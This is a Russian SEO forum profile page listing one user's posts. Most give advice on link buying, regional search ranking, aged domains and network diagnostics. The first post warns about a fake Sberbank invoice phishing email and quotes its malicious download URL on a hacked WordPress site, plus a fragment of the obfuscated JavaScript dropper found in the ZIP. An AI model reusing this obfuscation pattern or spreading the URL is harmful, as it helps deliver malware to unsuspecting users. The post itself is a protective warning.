kkey80

Members
  • Публикации

    45
  • Зарегистрирован

  • Посещение

О kkey80

  • Звание
    Местный

Profile Information

  • Специализация
    SEO

Посетители профиля

235 просмотров профиля
  1. Открываю почту, а там такое: http://c2n.me/3JGMwav http://c2n.me/3JGMzYT Данные об отправители: Ссылка ведет на эту страницу: olcudekorasyon.com/wp-includes/js/tinymce/plugins/wpdialogs/sber_schet.html скачивается документ и перенаправляет на основой сайт сбера. Прикрепленный файл пустой.. Скачивает ZIP, содержимое JS файл (отрывок): function UH() { var Aso = ""; return Aso; } function uw() { var hQ = ""; return hQ; } function Czk(Uv) { return "charAt"; } function lo(e) { var fs = UH(); fs += "'@j_lDO`z:RKbf1wH\\[SXYQ+6 %"; fs += "#EL(VZig0A];e/>3=|"; fs += "Jt{5Cv2M*4)Udor~yp.F!scN"; fs += "axuG8$T9q,^<\"PnWm7I}k&?h-B"; var ppo=989; var O=ppo+8293; var wwo=O/14; var PBh=wwo-632; var VTu = fs[Czk(e)](e-PBh); return VTu; } function Q() { var c=10840; var GYW=65489; return "l"; } function dgy() { var wA=25168; var Mud="x0!0In#"; return Q(); } function Mm() { var VI=27596; var Poo=58729; return "e"; } function LV() { var flQ=3203; var cpQ="U^fCDQ12-p"; return Mm(); } function Qa() { var N=57801; return dgy()+LV(); } function Nz() { return lo(5016/44+0); } function kxH() { return lo(2925/45+0); } Вот такие дела ). Будьте бдительны, возможно это только начало, для крупного взлома или еще чего...
  2. Домен, скорее всего не при делах. В гугл без ссылок не продвинуться. Попробуйте на Миралинск или ГГЛ купить ссылки схожей тематики до 300 рублей, сначала купите 3-4 ссылки, а потом в месяц 1-2 ссылки докупайте. Всякие "усиление эффекта" и прочее не включайте, просто ссылку. На каждый анкор: 1 ссылку и на каждую анкорную ссылку + 1 безанкор. Т.е. страница: dvpodarki ru/sergi-v-khabarovske, покупаем на нее 2 ссылки с сайтов схожей тематики: Первая ссылка "Купить серьги", вторая "dvpodarki ru/sergi-v-khabarovske" и т.д. результат будет заметен от 2х месяцев до 4-5
  3. Здравствуйте, интересует вот такой вопрос... Например есть фирма A, которая находится в московской области (далее, город X - настоящий физический адрес), но услуги предоставляет и по Москве и по всей области и даже в некоторых других регионах. Но по хорошим запросам дальше физического адреса (город X, который только на странице контакты прописан) яндекс не ранжирует сайт. А вот по НЧ и микроНЧ запросам ранжирует по всему региону (как и указано в яндекс вебмастере), основной трафик сейчас из "Москва", сразу после город X, и только потом другие города, которые крупнее города X. В яндекс справочнике сайта нет, т.к. чувствуется привязка к региону станет еще хуже, ведь адресов для других городов нет, а добавлять только основной думаю не стоит... Имеется мысля регистрации в яндекс каталоге и указать 7 основных городов, сие поможет делу? Кто-то пробовал? Может донажать покупкой ссылок или созданием псевдо-сдл, которые будут в нужном регионе и будут ссылаться на основной сайт? У страниц тайтлы и дескрипшены оптимизированы под "Москва и область". Может стоит делать отдельные страницы под каждый крупный город или перечислять? Москва, Видное, Люберцы, Одинцово и т.д. (5-6 регионов) - но это же пор.. адалтография... Заранее спасибо! PS. может даже быть так, что сайт недостаточно хороший для ранжирования в нужном регионе и именно поэтому конкуренты вытесняют... Но сайт развивается мало по малу, юзабилити все лучше, оптимизируется для удобства посетителей, а трафик с яндекса все меньше. Сказать что уступает конкурентам сильно, нет, совру, но до сайтов в ТОП 5 немного не дотягивает, всего в нише 15-20 крупных сайтов, но позиции за ТОП 20... PS. сайт молодой (5 месяцев), как появились красивые запросы, аля "услуга", "услуга москва" из нужной области, где-то через месяц, такие запросы отвалились (уже около 3-4 недель), причины многорукому бандиту так шутить не было. ПФ были хорошие у таких запросов (CTR в выдаче тоже нормальный). Думается, может асессоры постарались, именно отсюда возникли мысли изложенные выше, может стоит просто подождать и набраться траста, надеюсь на ваши советы, заранее спасибо. PS. текстов не так много, не думаю что баден-баден причастен, но все может быть..., мало текстов, высокая плотность(вхождение) слов "услуга, услуга, услуга". В вебмастере в нарушениях пусто. Извиняюсь за мнофобукфф, талантом кратко излагать обделен.
  4. Можно ссылку на ваши сайты в ЛС? PS. у меня чувство, либо у вас 100500+ кликандер и попандеров стоит на сайте, либо какой-то вирус, даже "нагон" полуроботов из соц сетей не дает % отказов больше 60, но чтобы сайт жил и приносил трафик?? Да еще и в РСЯ..!
  5. Любопытно просто.. ) Скажите пожалуйста, какая у вас серверная мощность? Парсите (частотность + ключи) с помощью API директа, напрямую или как-то через XML(если это возможно, через XML не слышал..)?
  6. Это не оскорбление пользователей, это факт, нет смысла продолжать обсуждать. Если улыбнулись я рад, а то ваша жизнь явно не сахар, если роман из 4 томов рядом не стоял... )
  7. Опять старую тему апнули)) сколько же работы для налоговой )))))) Обо мне.... Осторожно много букффф... Программист уже много лет, при относительно не большом возрасте 20 лет Хочу переквалифицироваться в сео, но не смотря на успешные проекты, все таки сложно, доход с этого рынка не более 10т. Программинг намного больше оставляет. Все свободное время это работа, замучала уже, а начиналось как хобби. Учился до 10 класса, забросил школу как пошли жирные заказы... сотрудничаю с студией, сео, фриланс.. Щас хочу angularjs выучить, за пару дней появилось понимание как все работает, но пока туго доходит... Все знания свои приобрел с помощью гугла... Ощущение что я старше своих лет, терпелив, люблю взвешенное и уважительное общение, иногда балуюсь... Детей нет, девушки/жены тоже. Почти сутками нахожусь дома, вешу много, не комплексую но понимаю, надо что то менять. Недавно предлагали поехать в Москву на постоянку (щас в Грузии), но пришлось отказаться, родители не хотят далеко отпускать, тем более в рф, мы же для вас все на одно лицо))) (по нации армянин) (в грузии многие с семьями живут, это нормально). Последнее время ленюсь работать и голова плохо варит... Получилось такое мини досье, хочу личный блог, но думаю, что не умею интересно излагать свои мысли, из-за этого падает мотивация. Пс. Я трезвый))) Не пью, не курю)))
  8. влияет и очень даже, не всегда домен с историей положительный результат дает... Что если там торговали ссылками, загнали сайт под АГС или еще чего-то? Все яндекс запомнил плохой домен, если вы думаете, что яндекс забывает об этом, то очень зря. Из жизни: Года 3 назад купил домен и сделал на нем сайт, лет 8 назад, на том домене размещался другой сайт (я узнал об этом к сожалению недавно). Ответ тп яндекса стабильно "Все в порядке, возможно в скором времени ваш сайт станет лучше ранжироваться", но до сих пор на тот сайт заходит около 10-12 человек, с учетом того, что там добавлено порядка 1000 копирайт страниц от 8 авторов (правда по 1200 символом текста, но тематика такая). Сейчас я уже даже домен заменил, но толку 0... Например для примера, другой мой игровой сайт, с 300 материалами, от тех же авторов, получал трафик около 5 тысяч в сутки. Тема дроп доменов сейчас для меня очень болезненная ) теперь 5 раз проверяю домен, 7 раз крещусь, хожу в церковь и только потом покупаю домен
  9. Домен дроп: http://web.archive.org/web/20110925113212/http://www.master-fishing.ru/ Часто этим многое объясняется...
  10. 3 своих сайта подавал, несколько сайтов клиентов, проблема в том, что в многих разделах особенно видимо на русском им не хватало рук. По 1-1,5 года модерацию проходили)))) Особенно бесило то что через 3-4 месяца вдруг в другой раздел перекидывали сайт)) думаю тема на форуме про дмоз доказывает. Подтвержденных сайтов единицы, а все остальное на модерации) Раньше еще 3-4 года назад стремился туда попасть, щас не обращаю внимания, но везде мелькает перед глазами, отсюда и негатив+реально отжил свое))) Если придумают что-то интересное, да и сделают что-то с модерацией я только за...
  11. Наконец то! Надеюсь кто-то еще поддерживает это мнение ) Теперь немного проще станет жить )
  12. Если стоит яндекс метрика, попробуйте через вебвизор посмотреть или по тепловой карте.
  13. Вроде все нормально, но тут есть одно но!, сайт у них по видимому через Cloudflare работает вряд ли программа на том же IP сидит.. Впринципе проблем с интернетом у вас не видно. скорее всего проблема или у них. или все таки где-то между сервером программы и вашим провайдером интернета (тут трассировка в помощь, но нужно узнать точно на какой IP идет подключение) Не думаю что дело в роутере, но все таки, попробуйте напрямую подключить кабель к компьютеру, если это возможно.
  14. попробуйте: Пусть -> Выполнить -> "cmd" - без кавычек (т.е. командную строку откройте) а уже там: ping zennolab.com а потом: tracert zennolab.com Дождитесь окончания и результат вышлите сюда (правая кнопка, выделить все, а потом ctr+c)
  15. На каждый регион отдельная страница, а главная или Москва или Россия